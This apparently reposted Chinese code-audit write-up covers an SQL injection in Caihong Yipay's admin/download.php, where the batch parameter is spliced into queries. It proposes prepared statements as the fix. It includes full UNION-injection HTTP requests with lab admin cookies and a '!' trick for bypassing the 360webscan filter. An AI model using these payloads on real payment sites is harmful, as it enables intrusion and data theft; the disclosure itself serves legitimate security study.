环境搭建
链接: https://pan.baidu.com/s/1e5D4wWydTuv90s98nRd1Wg?pwd=ege5 提取码: ege5
/install
一步步安装即可
后台sql注入
admin/download.php
$type = isset($_GET['type'])?trim($_GET['type']):'common';$batch=$_GET['batch'];$remark = text_encoding($conf['transfer_desc']);if($type == 'mybank'){$data="收款方名称,收款方账号,收款方开户行名称,收款行联行号,金额,附言/用途rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and (type=1 or type=4) order by id asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=text_encoding($row['username']).','.$row['account'].','.($row['type']=='1'?'支付宝':'').',,'.$row['realmoney'].','.$remark."rn"; }}elseif($type == 'alipay'){$data="支付宝批量付款文件模板rn";$data.="序号(必填),收款方支付宝账号(必填),收款方姓名(必填),金额(必填,单位:元),备注(选填)rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and type=1 order by id asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=$i.','.$row['account'].','.text_encoding($row['username']).','.$row['realmoney'].','.$remark."rn"; }}elseif($type == 'wxpay'){if(!$conf['transfer_wxpay'])sysmsg(mb_convert_encoding("未开启微信企业付款", "UTF-8", "GB2312"));$channel = libChannel::get($conf['transfer_wxpay']);if(!$channel)sysmsg(mb_convert_encoding("当前支付通道信息不存在", "UTF-8", "GB2312"));$wxinfo = libChannel::getWeixin($channel['appwxmp']);if(!$wxinfo)sysmsg(mb_convert_encoding("支付通道绑定的微信公众号不存在", "UTF-8", "GB2312"));$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and type=2 order by id asc");$i=0;$table="商家明细单号(必填),收款用户openid(必填),收款用户姓名(选填),收款用户身份证(选填),转账金额(必填,单位:元),转账备注(必填)rn";$allmoney = 0;while($row = $rs->fetch()) {$i++;$table.=$batch.$i.','.$row['account'].','.text_encoding($row['username']).',,'.$row['realmoney'].','.$remark."rn";$allmoney+=$row['realmoney']; }$data="微信支付批量转账到零钱模版(勿删)rn";$data.="商家批次单号(必填),".$batch."rn";$data.="批次名称(必填),批量转账".$batch."rn";$data.="转账appid(必填),".$wxinfo['appid']."rn";$data.="转账总金额(必填,单位:元),".$allmoney."rn";$data.="转账总笔数(必填),".$i."rn";$data.="批次备注(必填),批量转账".$batch."rn";$data.=",rn";$data.="转账明细(勿删)rn";$data.=$table;}else{$data="序号,收款方式,收款账号,收款人姓名,付款金额(元),付款理由rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' order by type asc,id 
asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=$i.','.display_type($row['type']).','.$row['account'].','.text_encoding($row['username']).','.$row['realmoney'].','.$remark."rn"; }}
$batch 变量（来自 $_GET['batch']）未经任何过滤或参数化，直接拼接到 SQL 语句中，形成 SQL 注入。修复方式应为使用预处理语句绑定参数，或在拼接前对 batch 做严格的白名单校验。
GET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&type=mybank HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dgufGET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&type=alipay HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dgufGET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dguf
绕过360webscan.php
在union联合注入中,使用!
绕过 360webscan
GET /admin/download.php?act=settle&batch=1%27+UNION+SELECT%21NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cuser%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dguf
原文始发于微信公众号(安全逐梦人):彩虹易支付代码审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。